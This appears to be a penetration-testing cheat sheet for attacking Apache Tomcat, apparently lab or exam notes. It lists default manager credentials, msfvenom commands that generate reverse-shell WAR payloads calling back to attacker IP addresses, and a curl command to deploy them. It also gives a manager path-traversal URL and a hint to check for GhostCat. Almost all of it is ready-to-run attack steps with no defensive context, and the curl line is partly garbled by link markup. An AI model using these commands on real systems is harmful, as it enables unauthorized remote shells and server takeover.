Access /manager with default creds
Usually tomcat:s3cret
Then upload and deploy revshell war file :
#Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
#Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war
Upload via curl
curl --user 'tomcat:s3cret' --upload-file shell.war l[ocalhost:8080/manager/deploy?path=/](<http://tomcat:tomcat@localhost:8080/manager/deploy?path=/application-0.1-1>)shell
Tomcat path traversal
<https://10.10.10.25/manager/status/>..;/html/
If port 8009 is open , chances are host is vulnerable to GhostCat